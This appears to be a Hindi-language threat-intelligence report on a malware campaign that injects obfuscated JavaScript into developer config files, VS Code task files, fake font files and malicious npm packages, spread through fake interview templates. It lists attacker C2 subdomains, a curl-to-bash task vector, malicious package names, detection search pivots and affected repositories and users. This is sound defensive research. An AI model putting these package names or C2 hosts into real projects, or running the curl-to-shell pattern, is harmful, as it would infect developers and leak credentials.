उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 161 | thanhdanh111/challenge | thanhdanh111 | उपयोगकर्ता | 0 | 0 | 2 | Problem-2/postcss.config.mjs | Problem-3/postcss.config.mjs | | | | 162 | hamza-nafasat/rentin-frontend | hamza-nafasat | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 163 | rejoan121615/ClientOps | rejoan121615 | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | ClientOps एक फुल-स्टैक आंतरिक संचालन डैशबोर्ड है जो एजेंसियों और छोटे व्यवसायों के लिए ग्राहकों, परियोजनाओं, टीम के सदस्यों और वर्कफ़्लो को सुरक्षित रूप से प्रबंधित करने के लिए डिज़ाइन किया गया है। | | | 164 | SouravDn-p/CMR | SouravDn-p | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 165 | EmanDeveloper/EasyTech | EmanDeveloper | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 166 | addis-ale/25-5-clock | addis-ale | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 167 | MSCPerera/Job-Board-App | MSCPerera | उपयोगकर्ता | 0 | 0 | 1 | job-board-app/postcss.config.mjs | | | | 168 | Nathanim1919/nextjs-project | Nathanim1919 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 169 | TimothyBabatu13/AegisHealth-Smart | TimothyBabatu13 | उपयोगकर्ता | 0 | 0 | 1 | aegis-health-smart/postcss.config.mjs | | | | 170 | Senti-fi/Senti.fi | Senti-fi | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 171 | Zentaurios/stable-monitor | Zentaurios | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 172 | SouravDn-p/Frontend-task | SouravDn-p | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 173 | Storaboy11/meerge | Storaboy11 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 174 | ahmedghonim/esraa | ahmedghonim | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 175 | vrunda310/AIA-VEGA-Frontend | vrunda310 | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 176 | emmanueldavidson96/popular_saas_product_landing_page | emmanueldavidson96 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 177 | pratikp72/deal-Project | pratikp72 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 178 | Al-amin07/file_sure | Al-amin07 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 179 | waris-ansar/finstar | waris-ansar | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 180 | MianHaziq/LKnight-Lms | MianHaziq | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 181 | pankajkhadse/TrustBasket | pankajkhadse | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 182 | adnaan-2/content-generation | adnaan-2 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 183 | malikjunaidhassann/seller-panel | malikjunaidhassann | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 184 | mdnuruzzamannirob/your-capture-awards-dashboard | mdnuruzzamannirob | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 185 | Minahil48/NY-caffine | Minahil48 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | आपकी सभी लालसाएं एक जगह | | | 186 | FrazKhan1/dev-team-chat | FrazKhan1 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 187 | jrioscloud/financial-document-analyzer | jrioscloud | उपयोगकर्ता | 0 | 0 | 1 | frontend/postcss.config.mjs | | | | 188 | seemab-ahmed/rodopi | seemab-ahmed | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 189 | JudeTejada/digital-pods | JudeTejada | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 190 | msuhels/RapidProject-Pos-System | msuhels | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 191 | Al-amin07/project_5_frontend | Al-amin07 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 192 | abdullah2310ishaq/afronaut | abdullah2310ishaq | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 193 | Jaskaran2701/Test-1 | Jaskaran2701 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 194 | Deepanshu7-bit/nugen-interns | Deepanshu7-bit | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 195 | saifullah-max/bublr | saifullah-max | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | | | 196 | Meet2054/automa8x-production-new | Meet2054 | उपयोगकर्ता | 0 | 0 | 1 | postcss.config.mjs | | |
| मीट्रिक | 8 मार्च (प्रारंभिक) | 11 अप्रैल (नवीनतम) | Δ |
|---|
| अद्वितीय संक्रमित रिपॉजिटरी | 675 | 1,951 | +1,276 |
| प्रभावित अद्वितीय मालिक | 352 | 1,047 | +695 |
| — व्यक्तिगत उपयोगकर्ता | 305 | ~930 | +625 |
| — संगठन | 47 | ~117 | +70 |
| देखे गए विशिष्ट ऑबफस्केटर वेरिएंट | 1 (rmcej%otb%) | 2 (rmcej%otb% + Cot%3t=shtP) | +1 |
| पुष्टि किए गए विशिष्ट इंजेक्शन वेक्टर | 1 (config file) | 4 (config file, .vscode/tasks.json, fake .woff2 font, malicious npm dep) | +3 |
| दस्तावेजित विशिष्ट C2 उपडोमेन | 1 (260120.vercel.app) | 6+ (देखें C2 Infrastructure) | +5 |
| ज्ञात हथियारीकृत टेक-होम टेम्पलेट | 0 | 2+ (ShoeVista, StakingGame) | +2 |
rmcej_otb_payloadखतरा अभिनेता पहले के पीड़ितों को फिर से संक्रमित कर रहा है। कम से कम एक पीड़ित रिपॉजिटरी (HassanHabibTahir/testclient) में अलग-अलग फ़ाइलों में दोनों वेरिएंट से मार्कर हैं, जो दर्शाता है कि अभिनेता के उपकरण पहले से समझौता किए गए होस्ट के खिलाफ फिर से चल रहे हैं और नए ऑबफस्केटर को इंजेक्ट कर रहे हैं।
PolinRider और TasksJacker ने परिचालन रूप से विलय कर लिया है। अब हमारे पास प्रत्यक्ष सबूत है कि एक ही खतरा अभिनेता एक ही पीड़ित आबादी के खिलाफ कॉन्फिग-फ़ाइल इंजेक्शन और .vscode/tasks.json curl-to-shell संक्रमण वेक्टर दोनों चला रहा है। 101 temp_auto_push.bat प्रसार-स्क्रिप्ट पीड़ितों में से 22 के पास दुर्भावनापूर्ण .vscode/tasks.json फ़ाइलें भी हैं, और कई हथियारीकृत टेक-होम / फर्जी-इंटरव्यू टेम्पलेट प्रोजेक्ट की पहचान की गई है — नीचे हथियारीकृत टेक-होम टेम्पलेट देखें। OSM आगे बढ़ते हुए दो क्लस्टर को #polinrider के तहत समेकित कर रहा है।
दो हथियारीकृत टेक-होम टेस्ट प्रोजेक्ट की पहचान की गई: ShoeVista (एक नकली Tailwind ई-कॉमर्स मूल्यांकन जो client/package.json में दुर्भावनापूर्ण tailwindcss-style-animate ^1.1.6 के साथ आता है) और StakingGame (एक नकली ब्लॉकचेन / VS Code ऑटोमेशन प्रोजेक्ट जिसकी पहचान tasks.json में UUID e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 द्वारा की गई है)। कम से कम 46 + 42 डेवलपर्स ने इन परीक्षणों का प्रयास किया और समझौता किए गए। Contagious Interview लूर प्लेबुक का हिस्सा।
पांच नए C2 उपडोमेन खोजे गए जो .vscode/tasks.json curl | bash पेलोड में उपयोग किए जा रहे हैं, सभी Vercel पर होस्ट किए गए हैं:
default-configuration.vercel.app (सबसे अधिक उपयोग, ~106 पीड़ित संदर्भ)vscode-settings-bootstrap.vercel.appvscode-settings-config.vercel.appvscode-bootstrapper.vercel.appvscode-load-config.vercel.appसभी पैटर्न https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N> का अनुसरण करते हैं। C2 Infrastructure अनुभाग में जोड़ा गया।
OSM ने इस दो-दिवसीय शिकार में 821 नई खतरे की रिपोर्ट प्रस्तुत की, जिससे कुल OSM PolinRider प्रविष्टियाँ ~1,700 हो गईं। 821 सबमिशन का वेरिएंट ब्रेकडाउन: 591 मूल वेरिएंट (rmcej%otb%), 113 केवल-प्रसार (temp_auto_push.bat), 45 malicious_npm (ShoeVista/devhire क्लस्टर), 27 tasksjacker, 1 नया वेरिएंट (Cot%3t=shtP), 44 अन्य।
नए उच्च-उपज खोज पिवट्स की पहचान की गई जो JS पेलोड साफ हो जाने पर भी पीड़ितों को ढूंढते हैं। सबसे मजबूत हैं filename:temp_auto_push.bat (101 पुष्टि-दुर्भावनापूर्ण परिणाम, 100% सही-सकारात्मक दर) और "default-configuration.vercel.app" (106 हिट)। 44 यादृच्छिक सत्यापनों में नमूना झूठी-सकारात्मक दर 0% थी। नीचे रिफाइनमेंट कार्यप्रणाली देखें।
एक नए इंजेक्शन वेक्टर की पुष्टि की गई: कम से कम एक पीड़ित (AgbaD/odoo) में .woff2 फ़ॉन्ट फ़ाइल (public/fonts/fa-solid-400.woff2) में छिपा हुआ अस्पष्ट JS पेलोड है जो Node के माध्यम से निष्पादित होता है — यह पुष्टि करता है कि अभियान एक ही लक्ष्य के खिलाफ कई इंजेक्शन वेक्टर का उपयोग करता है।
कोई तीसरा ऑबफस्केटर वेरिएंट नहीं मिला। global['?'] मार्करों, सीड संयोजनों, संरचनात्मक पैटर्न, IOC शाब्दिक, और अनुक्रमिक '8-stN' टैग 1–200 (Sourcegraph regex के माध्यम से) की संपूर्ण जांच ने पहले से दस्तावेजित दो से परे तीसरे वेरिएंट का कोई सबूत नहीं दिया। अभिनेता का नया-वेरिएंट बैच 8-st1..8-st59 पर सीमित है (Sourcegraph के इंडेक्स से 21 अनुक्रमिक संख्याएं गायब हैं)।
temp_auto_push.bat और .gitignore से संदर्भित किसी भी config.bat की तलाश करें। भले ही अस्पष्ट JS पेलोड को साफ कर दिया गया हो, यह फ़ाइल पिछले समझौते का प्रत्यक्ष प्रमाण है और इसे क्रेडेंशियल रोटेशन को ट्रिगर करना चाहिए।public/, static/, assets/ में बाइनरी एसेट्स की जाँच करें कि कहीं अनपेक्षित .woff / .woff2 फ़ाइलें तो नहीं हैं — मैलवेयर को नकली फ़ॉन्ट फ़ाइलों (the "fake-font" sub-variant) के अंदर पेलोड छिपाते हुए देखा गया है।package.json निर्भरताओं की समीक्षा करें — विशेष रूप से हाल ही में जोड़े या अपडेट किए गए कोई भी PostCSS/Tailwind-संबंधित पैकेज जैसे tailwind-mainanimation, tailwind-autoanimation, और नीचे सूचीबद्ध अन्य npm पैकेज।node_modules में पोस्टइंस्टॉल स्क्रिप्ट की जाँच करें: grep -r "postinstall" node_modules/*/package.jsonrmcej%otb% वेरिएंट की पिछली सफाई के बाद घुमाए गए Cot%3t=shtP वेरिएंट से पुन: संक्रमित हो गया था। समय-समय पर पुन: स्कैन करें।| फ़ाइल | घटनाएँ (8 मार्च) | घटनाएँ (10 अप्रैल) |
|---|
postcss.config.mjs | 416 | ~960 |
tailwind.config.js | 84 | ~210 |
eslint.config.mjs | 60 | ~150 |
postcss.config.js | 13 | ~40 |
App.js | 13 | ~30 |
next.config.mjs | 12 | ~30 |
index.js | 6 | ~25 |
astro.config.mjs | 6 | ~15 |
tailwind.config.mjs | 5 | ~12 |
vite.config.js / vite.config.mjs | — | ~20 |
webpack.config.js | — | ~15 |
gridsome.config.js | — | ~5 |
vue.config.js | — | ~10 |
truffle.js | — | ~5 |
temp_auto_push.bat (प्रसार स्क्रिप्ट कलाकृति) | — | 101 |
.woff2 फ़ॉन्ट फ़ाइलें (फ़ेक-फ़ॉन्ट उप-प्रकार) | — | देखा गया |
| पैकेज | नवीनतम संस्करण | स्थिति | प्रकाशक | देखे गए पीड़ितों की संख्या (11 अप्रैल) |
|---|
tailwindcss-style-animate | 1.1.6 | देखा गया | (खाता हटा दिया गया) | 34 ← प्राथमिक ShoeVista निर्भरता |
tailwind-mainanimation | 2.3.3 → 0.0.1-security | npm द्वारा हटा दिया गया (सुरक्षा प्लेसहोल्डर द्वारा प्रतिस्थापित 2026-03-13) | allavin (खाता हटा दिया गया) | 1 |
tailwind-autoanimation | 2.3.6 | रजिस्ट्री से हटा दिया गया | blackedward (खाता हटा दिया गया) | 2 |
tailwind-animationbased | — | देखा गया | (खाता हटा दिया गया) | 0 |
tailwindcss-typography-style | 0.8.2 | देखा गया | (खाता हटा दिया गया) | 6 |
tailwindcss-style-modify | 0.8.3 | देखा गया | (खाता हटा दिया गया) | 4 |
tailwindcss-animate-style | 1.2.5 | देखा गया | (खाता हटा दिया गया) | 0 |
| विशेषता | मूल वेरिएंट | नया वेरिएंट |
|---|
| हस्ताक्षर मार्कर | rmcej%otb% | Cot%3t=shtP |
| शफल बीज (परत 1) | 2857687 | 1111436 |
| द्वितीयक बीज (परत 2) | 2667686 | 3896884 |
| डीकोडर फ़ंक्शन नाम | _$_1e42 | MDy |
| इंजेक्टेड ग्लोबल | global['!'], global['r'], global['m'] | global['_V'], global['r'], global['m'] |
| लक्षित फ़ाइल प्रकार | postcss.config.mjs, tailwind.config.js, eslint.config.mjs, आदि। | (समान) |
| इंजेक्शन शैली | वैध export default / मॉड्यूल बॉडी के बाद जोड़ा गया | (समान) |
| ब्लॉकचेन C2 | TRON / Aptos / BSC | (समान — पते अपरिवर्तित) |
| XOR कुंजियाँ | अपरिवर्तित | अपरिवर्तित |
alaminrifat/shoevista-rifat, Atik203/ShoeVista, DaviBarros/shoevista, IchaCoder/test-shoe, Anas-Ali-3673/Test-west-shoe, naime7132/client-2 (devhire वेरिएंट)ShoeVista, shoevista-rifat, HedaetShahriar/ShoeVista-Test) या साक्षात्कार प्लेटफ़ॉर्म (Test-002, test-shoe, test_upwork, test_west_shoe) के नाम पर रखते हैं| सबडोमेन | गणना (11 अप्रैल) | पहली बार देखा गया | नोट्स |
|---|
260120.vercel.app | 56 | मार्च 8 से पहले | मूल OSM क्वेरी Q11; पहले ब्लॉग में भी प्रकाशित |
default-configuration.vercel.app | 106 | अप्रैल 2026 | अब तक का सबसे बड़ा एकल-सबडोमेन क्लस्टर |
vscode-settings-bootstrap.vercel.app | 16 | अप्रैल 2026 | |
vscode-settings-config.vercel.app | 11 | अप्रैल 2026 | |
vscode-bootstrapper.vercel.app | 6 | अप्रैल 2026 | |
vscode-load-config.vercel.app | 6 | अप्रैल 2026 |
| खोजा गया फ़ाइलनाम | परिणाम |
|---|
postcss.config.mjs | 416 |
tailwind.config.js | 84 |
eslint.config.mjs | 60 |
App.js | 13 |
postcss.config.js | 13 |
next.config.mjs | 12 |
index.js | 6 |
astro.config.mjs | 6 |
| अन्य कॉन्फ़िग फ़ाइलें | 81 |
| कुल (प्री-डिडुप) | 700 |
| अद्वितीय रिपॉजिटरी | 675 |
| # | पिवट | इंजन | योगदान किए गए अद्वितीय रिपॉजिटरी |
|---|
| 1 | filename:temp_auto_push.bat | GitHub Code Search | 101 |
| 2 | "_$_1e42" (एक्सटेंशन/साइज़/फ़ोर्क परिशोधन के साथ) | GitHub Code Search | 1,323 |
| 3 | "function MDy(f)" global _V | GitHub Code Search | 14 |
| 4 | LAST_COMMIT_DATE LAST_COMMIT_TIME extension:bat | GitHub Code Search | 236 |
| 5 | Cot%3t=shtP रेगेक्स fork:yes archived:yes के साथ | Sourcegraph | 41 |
| राउंड 1 संयुक्त | 1,556 | ||
| 6 | "<malicious_npm_package>" filename:package.json (7 npm पैकेज) | GitHub Code Search | 46 |
| 7 | <url> filename:tasks.json (vercel.app, onrender.com, 260120.vercel.app) | GitHub Code Search | 145 |
| 8 | "default-configuration.vercel.app" और 4 सहोदर vscode-*.vercel.app सबडोमेन | GitHub Code Search | 94 |
| 9 | "e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" (StakingGame टेम्पलेट UUID) | GitHub Code Search | 42 |
| 10 | अनुक्रमिक '8-stN' 1–200 गणना (अअनुक्रमित अनुक्रमिक टैग की जाँच) | Sourcegraph regex | 0 नया |
| राउंड 2 संयुक्त | +215 | ||
| कुल अद्वितीय (दोनों राउंड + मौजूदा CSV) | 1,951 |
| परिशोधन | total_count |
|---|
extension:js | 430 |
extension:mjs | 676 |
extension:cjs | 17 |
extension:ts | 7 |
extension:html | 1 |
size:<5000 | 4 |
size:5000..6000 | 630 |
size:6000..7000 | 125 |
size:7000..8000 | 139 |
size:8000..9000 | 56 |
size:9000..10000 | 36 |
size:10000..50000 | 112 |
size:>50000 | 12 |
fork:true | 157 (डिफ़ॉल्ट रूप से बाहर रखा गया!) |
| स्रोत | अद्वितीय रिपॉजिटरी | अद्वितीय स्वामी |
|---|
| मूल मार्च 8 प्रकाशन | 675 | 352 |
affected_repos.csv (मार्च 18 अपडेट) | 769 | 399 |
| अप्रैल 10 v3 मास्टर (5 पिवट) | 1,556 | 835 |
| अप्रैल 11 राउंड 2 (5 अतिरिक्त पिवट) | +215 नेट नया | +158 नेट नया |
| संघ (वास्तविक दायरा, अप्रैल 11) | 1,951 | 1,047 |
| फ़ाइल | विवरण |
|---|
README.md | यह रिपोर्ट |
polinrider-rides-again.md | फ़ॉलो-अप ब्लॉग (अप्रैल 11) जिसमें अभियान वृद्धि, TasksJacker / PolinRider विलय, और पूर्ण एंड-टू-एंड पेलोड रिवर्स इंजीनियरिंग शामिल है |
affected_repos.csv | प्रभावित रिपॉजिटरी — पहले संगठन, फिर उपयोगकर्ता, प्रत्येक को सितारे+फ़ोर्क के अवरोही क्रम में क्रमबद्ध किया गया है। नोट: 2026-04-11 तक इस CSV में मार्च 18 संग्रह से 769 प्रविष्टियाँ हैं। अप्रैल 10–11 की खोजों ने ~1,180 नए रिपॉजिटरी जोड़े जो अभी तक इस CSV में विलय नहीं हुए हैं (वे reports/polinrider-master-v3-1556.tsv और reports/polinrider-round2-repos.txt में ट्रैक किए गए हैं)। वास्तविक ज्ञात दायरा 1,951 अद्वितीय रिपॉजिटरी है। |
affected_users.csv | प्रभावित स्वामी — पहले संगठन, फिर उपयोगकर्ता, प्रत्येक को अनुयायियों के अवरोही क्रम में क्रमबद्ध किया गया है। 2026-04-11 तक इसमें 399 प्रविष्टियाँ हैं; अप्रैल खोज संघ में 1,047 स्वामी हैं। |
reports/polinrider-master-v3-1556.tsv | अप्रैल 10 खोज मास्टर सूची: v3 खोज में पाए गए सभी 1,556 रिपॉजिटरी के लिए repo \t osm_status \t threat_id \t severity \t sources |
reports/polinrider-new-v3.tsv | वे 705 रिपॉजिटरी जो 2026-04-10 को OSM में नए जोड़े गए |
reports/polinrider-round2-repos.txt | राउंड 2 स्वच्छ मास्टर सूची (5 नए पिवट से 239 अद्वितीय रिपॉजिटरी) |
reports/polinrider-round2-submissions-2026-04-11.tsv | वे 72 रिपॉजिटरी जो 2026-04-11 को OSM में नए जोड़े गए (राउंड 2) |
reports/polinrider-scope-v3-2026-04-10.md | पूर्ण v3 दायरा रिपोर्ट जिसमें परिशोधन पद्धति और गलत-सकारात्मक विश्लेषण शामिल है |
reports/polinrider-submissions-2026-04-10.md | 2026-04-10 को दायर 704 OSM खतरा रिपोर्टों के लिए सामूहिक सबमिशन रिपोर्ट |
reports/polinrider-scope-v3-2026-04-10.md | v3 दायरा रिपोर्ट |
| रिपॉजिटरी | सितारे | फ़ोर्क | संक्रमित फ़ाइल |
|---|
Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform | 6 | 11 | postcss.config.mjs |
Victorola-coder/tewo | 9 | 6 | tailwind.config.js |
Kreliannn/Document-Request-System-FRONTEND | 8 | 1 | postcss.config.mjs |
Atik203/Scholar-Flow | 4 | 4 | postcss.config.mjs |
sparktechagency/Vap-shop-Front-End- | 7 | 0 | postcss.config.mjs |
Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND | 7 | 0 | postcss.config.mjs |
coderkhalide/Anti-Detect-Browser | 2 | 4 | tailwind.config.js |
tanushbhootra576/Bionary-Website-Challenge-and-final | 4 | 2 | tailwind.config.js |
tanushbhootra576/collegeConnect | 5 | 1 | postcss.config.mjs |
Kreliannn/commision_portfolio | 6 | 0 | postcss.config.mjs |
| संगठन | अनुयायी | प्रभावित रिपॉजिटरी |
|---|
sparktechagency | 130 | 12 |
FSDTeam-SAA | 21 | 12 |
Softvence-Omega-Dev-Ninjas | 18 | 4 |
Codechef-VITC-Student-Chapter | 17 | 1 |
softvence-omega-future-stack | 11 | 4 |
The-Extra-Project | 11 | 1 |
etrainermis | 7 | 1 |
tricodenetwork | 7 | 1 |
Binary-Mindz | 6 | 1 |
Gamage-Recruiters-406 | 5 | 1 |
| उपयोगकर्ता | अनुयायी | प्रभावित रिपॉजिटरी |
|---|
coderkhalide | 349 | 4 |
finom | 172 | 4 |
Victorola-coder | 121 | 1 |
dhruvmalik007 | 87 | 6 |
saif72437 | 57 | 2 |
a-belard | 43 | 1 |
Muhammadfaizanjanjua109 | 39 | 1 |
Nathanim1919 | 38 | 5 |
kanchana404 | 33 | 3 |
AKDebug-UX | 30 | 4 |